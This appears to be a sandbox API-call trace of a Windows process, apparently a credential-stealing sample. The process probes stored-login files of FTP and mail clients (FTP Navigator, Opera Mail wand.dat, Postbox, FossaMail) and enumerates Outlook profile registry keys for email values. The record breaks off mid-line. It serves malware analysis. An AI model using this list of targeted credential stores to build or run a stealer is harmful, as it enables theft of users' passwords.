GetProcessHeap () returned 0x740000 [0250.801] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0250.802] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0250.802] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Windows") returned 0x0 [0250.802] GetProcessHeap () returned 0x740000 [0250.802] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x75b6c0 [0250.803] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0250.804] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\32BitFtp.TMP", arglist=0x19fba0 | out: param_1="C:\\Windows\\32BitFtp.TMP") returned 23 [0250.804] GetProcessHeap () returned 0x740000 [0250.805] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x32) returned 0x74d6e8 [0250.805] GetProcessHeap () returned 0x740000 [0250.805] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.806] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0250.806] PathFileExistsW (pszPath="C:\\Windows\\32BitFtp.TMP") returned 0 [0250.807] GetProcessHeap () returned 0x740000 [0250.807] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74d6e8 | out: hHeap=0x740000) returned 1 [0250.807] GetProcessHeap () returned 0x740000 [0250.807] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0250.807] GetProcessHeap () returned 0x740000 [0250.808] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0250.808] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0250.809] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Windows") returned 0x0 [0250.955] GetProcessHeap () returned 0x740000 [0250.955] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x75b6c0 [0250.956] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0250.957] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\32BitFtp.ini", arglist=0x19fb94 | out: param_1="C:\\Windows\\32BitFtp.ini") returned 23 [0250.957] GetProcessHeap () returned 0x740000 [0250.957] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x32) returned 0x74d928 [0250.957] GetProcessHeap () returned 0x740000 [0250.958] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0250.960] PathFileExistsW (pszPath="C:\\Windows\\32BitFtp.ini") returned 0 [0250.960] GetProcessHeap () returned 0x740000 [0250.961] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74d928 | out: hHeap=0x740000) returned 1 [0250.961] GetProcessHeap () returned 0x740000 [0250.962] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0250.962] GetProcessHeap () returned 0x740000 [0250.962] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0250.962] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x75a488, nSize=0x104 | out: lpDst="C:") returned 0x3 [0250.962] GetProcessHeap () returned 0x740000 [0250.962] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f78) returned 0x75b6c0 [0250.963] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0250.964] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\FTP Navigator\\Ftplist.txt", arglist=0x19fba0 | out: param_1="C:\\FTP Navigator\\Ftplist.txt") returned 28 [0250.964] GetProcessHeap () returned 0x740000 [0250.964] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3c) returned 0x754610 [0250.964] GetProcessHeap () returned 0x740000 [0250.965] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.966] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0250.966] PathFileExistsW (pszPath="C:\\FTP Navigator\\Ftplist.txt") returned 0 [0250.966] GetProcessHeap () returned 0x740000 [0250.967] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x754610 | out: hHeap=0x740000) returned 1 [0250.967] GetProcessHeap () returned 0x740000 [0250.967] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0250.967] GetProcessHeap () returned 0x740000 [0250.967] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0250.968] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x75a488, nSize=0x104 | out: lpDst="C:") returned 0x3 [0250.968] GetProcessHeap () returned 0x740000 [0250.968] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f92) returned 0x75b6c0 [0250.969] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0250.970] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\Softwarenetz\\Mailing\\Daten\\mailing.vdt", arglist=0x19fb40 | out: param_1="C:\\Softwarenetz\\Mailing\\Daten\\mailing.vdt") returned 41 [0250.970] GetProcessHeap () returned 0x740000 [0250.970] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x56) returned 0x75a7c8 [0250.970] GetProcessHeap () returned 0x740000 [0250.971] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0250.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0251.101] PathFileExistsW (pszPath="C:\\Softwarenetz\\Mailing\\Daten\\mailing.vdt") returned 0 [0251.102] GetProcessHeap () returned 0x740000 [0251.102] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0251.102] GetProcessHeap () returned 0x740000 [0251.103] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0251.103] GetProcessHeap () returned 0x740000 [0251.103] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f82) returned 0x75b6c0 [0251.104] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0251.105] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\Opera Mail\\Opera Mail\\wand.dat", arglist=0x19fb4c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Mail\\Opera Mail\\wand.dat") returned 68 [0251.105] GetProcessHeap () returned 0x740000 [0251.105] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x8c) returned 0x75a488 [0251.105] GetProcessHeap () returned 0x740000 [0251.105] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0251.106] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0251.107] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Mail\\Opera Mail\\wand.dat") returned 0 [0251.107] GetProcessHeap () returned 0x740000 [0251.107] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0251.107] GetProcessHeap () returned 0x740000 [0251.108] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75b6c0 [0251.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0251.109] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Postbox\\Postbox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x75b6c0, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x75b6c0, pcbData=0x19fba4*=0x104) returned 0x2 [0251.109] GetProcessHeap () returned 0x740000 [0251.110] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0251.110] GetProcessHeap () returned 0x740000 [0251.110] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75b6c0 [0251.110] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0251.111] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\FossaMail", pszValue="CurrentVersion", pdwType=0x0, pvData=0x75b6c0, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x75b6c0, pcbData=0x19fba4*=0x104) returned 0x2 [0251.111] GetProcessHeap () returned 0x740000 [0251.111] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0251.111] GetProcessHeap () returned 0x740000 [0251.111] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0251.112] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0251.113] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0251.114] Sleep (dwMilliseconds=0xa) [0251.454] GetProcessHeap () returned 0x740000 [0251.454] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75b6c0 [0251.455] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0251.456] wvsprintfW (in: param_1=0x75b6c0, param_2="%s\\%s", arglist=0x19f8f4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*Mailbox.ini") returned 44 [0251.456] GetProcessHeap () returned 0x740000 [0251.456] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5c) returned 0x75a7c8 [0251.456] GetProcessHeap () returned 0x740000 [0251.457] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0251.457] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*Mailbox.ini", lpFindFileData=0x19f908 | out: lpFindFileData=0x19f908*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x747e20, ftLastWriteTime.dwHighDateTime=0x747e20, nFileSizeHigh=0x753f70, nFileSizeLow=0x7546e0, dwReserved0=0x0, dwReserved1=0x19f964, cFileName="ը瞼", cAlternateFileName="뒭蕬͈읩䑏鋫ﭬ\x19䂑@")) returned 0xffffffff [0251.457] GetProcessHeap () returned 0x740000 [0251.458] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0251.458] GetProcessHeap () returned 0x740000 [0251.458] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0251.458] GetProcessHeap () returned 0x740000 [0251.458] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e8) returned 0x75b6c0 [0251.458] GetProcessHeap () returned 0x740000 [0251.458] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74ba40 [0251.458] GetProcessHeap () returned 0x740000 [0251.458] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b510 [0251.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0251.460] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\WinChips\\UserAccounts", phkResult=0x75b510 | out: phkResult=0x75b510*=0x0) returned 0x2 [0251.460] GetProcessHeap () returned 0x740000 [0251.460] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b510 | out: hHeap=0x740000) returned 1 [0251.460] GetProcessHeap () returned 0x740000 [0251.460] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0251.587] GetProcessHeap () returned 0x740000 [0251.587] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74ba40 | out: hHeap=0x740000) returned 1 [0251.587] GetProcessHeap () returned 0x740000 [0251.587] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e8) returned 0x75b6c0 [0251.587] GetProcessHeap () returned 0x740000 [0251.587] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74b920 [0251.587] GetProcessHeap () returned 0x740000 [0251.588] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b5a0 [0251.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0251.589] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", phkResult=0x75b5a0 | out: phkResult=0x75b5a0*=0x0) returned 0x2 [0251.589] GetProcessHeap () returned 0x740000 [0251.589] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b5a0 | out: hHeap=0x740000) returned 1 [0251.589] GetProcessHeap () returned 0x740000 [0251.589] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b5e0 [0251.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0251.591] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook", phkResult=0x75b5e0 | out: phkResult=0x75b5e0*=0x0) returned 0x2 [0251.591] GetProcessHeap () returned 0x740000 [0251.591] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b5e0 | out: hHeap=0x740000) returned 1 [0251.591] GetProcessHeap () returned 0x740000 [0251.591] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b630 [0251.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0251.592] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook", phkResult=0x75b630 | out: phkResult=0x75b630*=0x218) returned 0x0 [0251.593] GetProcessHeap () returned 0x740000 [0251.593] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bab0 [0251.593] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0251.594] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x0, pszName=0x75bab0, pcchName=0x19fb7c | out: pszName="0a0d020000000000c000000000000046", pcchName=0x19fb7c) returned 0x0 [0251.594] GetProcessHeap () returned 0x740000 [0251.594] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b4e0 [0251.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0251.643] RegOpenKeyW (in: hKey=0x218, lpSubKey="0a0d020000000000c000000000000046", phkResult=0x75b4e0 | out: phkResult=0x75b4e0*=0x210) returned 0x0 [0251.643] GetProcessHeap () returned 0x740000 [0251.643] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0251.644] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0251.645] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208) returned 0x2 [0251.645] GetProcessHeap () returned 0x740000 [0251.646] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0251.646] GetProcessHeap () returned 0x740000 [0251.646] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75bec8 [0251.647] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0251.648] wvsprintfW (in: param_1=0x75bec8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046") returned 88 [0251.648] GetProcessHeap () returned 0x740000 [0251.648] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x75fe20 [0251.648] GetProcessHeap () returned 0x740000 [0251.649] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0251.649] GetProcessHeap () returned 0x740000 [0251.649] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b580 [0251.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0251.651] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", phkResult=0x75b580 | out: phkResult=0x75b580*=0x204) returned 0x0 [0251.651] GetProcessHeap () returned 0x740000 [0251.651] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0251.652] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0251.652] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x75bec8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0251.652] GetProcessHeap () returned 0x740000 [0251.653] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0251.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0251.654] RegCloseKey (hKey=0x204) returned 0x0 [0251.654] GetProcessHeap () returned 0x740000 [0251.654] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b580 | out: hHeap=0x740000) returned 1 [0251.654] GetProcessHeap () returned 0x740000 [0251.654] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75fe20 | out: hHeap=0x740000) returned 1 [0251.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0251.656] RegCloseKey (hKey=0x210) returned 0x0 [0251.656] GetProcessHeap () returned 0x740000 [0251.656] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4e0 | out: hHeap=0x740000) returned 1 [0251.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0251.657] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x1, pszName=0x75bab0, pcchName=0x19fb7c | out: pszName="13dbb0c8aa05101a9bb000aa002fc45a", pcchName=0x19fb7c) returned 0x0 [0251.657] GetProcessHeap () returned 0x740000 [0251.657] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b5b0 [0251.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0251.659] RegOpenKeyW (in: hKey=0x218, lpSubKey="13dbb0c8aa05101a9bb000aa002fc45a", phkResult=0x75b5b0 | out: phkResult=0x75b5b0*=0x210) returned 0x0 [0251.659] GetProcessHeap () returned 0x740000 [0251.659] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0251.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0251.660] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208) returned 0x2 [0251.660] GetProcessHeap () returned 0x740000 [0251.661] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0251.661] GetProcessHeap () returned 0x740000 [0251.661] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75bec8 [0251.662] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0251.663] wvsprintfW (in: param_1=0x75bec8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a") returned 88 [0251.663] GetProcessHeap () returned 0x740000 [0251.663] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x75fe20 [0251.663] GetProcessHeap () returned 0x740000 [0251.664] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0251.664] GetProcessHeap () returned 0x740000 [0251.664] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b680 [0251.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0251.665] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", phkResult=0x75b680 | out: phkResult=0x75b680*=0x204) returned 0x0 [0251.666] GetProcessHeap () returned 0x740000 [0251.666] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0251.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0251.667] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x75bec8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0251.667] GetProcessHeap () returned 0x740000 [0251.667] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0251.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0251.789] RegCloseKey (hKey=0x204) returned 0x0 [0251.789] GetProcessHeap () returned 0x740000 [0251.789] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b680 | out: hHeap=0x740000) returned 1 [0251.789] GetProcessHeap () returned 0x740000 [0251.789] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75fe20 | out: hHeap=0x740000) returned 1 [0251.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0251.904] RegCloseKey (hKey=0x210) returned 0x0 [0251.904] GetProcessHeap () returned 0x740000 [0251.904] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b5b0 | out: hHeap=0x740000) returned 1 [0251.905] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0251.905] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x2, pszName=0x75bab0, pcchName=0x19fb7c | out: pszName="2db91c5fd8470d46b1a5bc5efab4cae7", pcchName=0x19fb7c) returned 0x0 [0251.905] GetProcessHeap () returned 0x740000 [0251.905] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b5c0 [0251.906] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0251.907] RegOpenKeyW (in: hKey=0x218, lpSubKey="2db91c5fd8470d46b1a5bc5efab4cae7", phkResult=0x75b5c0 | out: phkResult=0x75b5c0*=0x210) returned 0x0 [0251.907] GetProcessHeap () returned 0x740000 [0251.907] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0251.908] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0251.909] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208) returned 0x2 [0251.909] GetProcessHeap () returned 0x740000 [0251.909] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0251.909] GetProcessHeap () returned 0x740000 [0251.909] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75bec8 [0251.910] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0251.911] wvsprintfW (in: param_1=0x75bec8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\2db91c5fd8470d46b1a5bc5efab4cae7") returned 88 [0251.911] GetProcessHeap () returned 0x740000 [0251.911] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x75fe20 [0251.911] GetProcessHeap () returned 0x740000 [0251.912] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0251.912] GetProcessHeap () returned 0x740000 [0251.912] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b5b0 [0251.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0251.913] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\2db91c5fd8470d46b1a5bc5efab4cae7", phkResult=0x75b5b0 | out: phkResult=0x75b5b0*=0x204) returned 0x0 [0251.914] GetProcessHeap () returned 0x740000 [0251.914] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0251.914] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0251.914] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x75bec8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0251.915] GetProcessHeap () returned 0x740000 [0251.915] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0251.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0251.916] RegCloseKey (hKey=0x204) returned 0x0 [0251.917] GetProcessHeap () returned 0x740000 [0251.917] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b5b0 | out: hHeap=0x740000) returned 1 [0251.917] GetProcessHeap () returned 0x740000 [0251.917] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75fe20 | out: hHeap=0x740000) returned 1 [0252.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0252.677] RegCloseKey (hKey=0x210) returned 0x0 [0252.677] GetProcessHeap () returned 0x740000 [0252.677] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b5c0 | out: hHeap=0x740000) returned 1 [0252.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0252.678] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x3, pszName=0x75bab0, pcchName=0x19fb7c | out: pszName="3517490d76624c419a828607e2a54604", pcchName=0x19fb7c) returned 0x0 [0252.678] GetProcessHeap () returned 0x740000 [0252.678] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b560 [0252.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0252.696] RegOpenKeyW (in: hKey=0x218, lpSubKey="3517490d76624c419a828607e2a54604", phkResult=0x75b560 | out: phkResult=0x75b560*=0x210) returned 0x0 [0252.696] GetProcessHeap () returned 0x740000 [0252.696] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0252.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0252.697] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208) returned 0x2 [0252.697] GetProcessHeap () returned 0x740000 [0252.698] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0252.698] GetProcessHeap () returned 0x740000 [0252.698] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75bec8 [0252.699] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0252.699] wvsprintfW (in: param_1=0x75bec8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604") returned 88 [0252.700] GetProcessHeap () returned 0x740000 [0252.700] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x75fe20 [0252.700] GetProcessHeap () returned 0x740000 [0252.700] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0252.700] GetProcessHeap () returned 0x740000 [0252.700] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b640 [0252.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0252.702] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", phkResult=0x75b640 | out: phkResult=0x75b640*=0x204) returned 0x0 [0252.702] GetProcessHeap () returned 0x740000 [0252.702] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 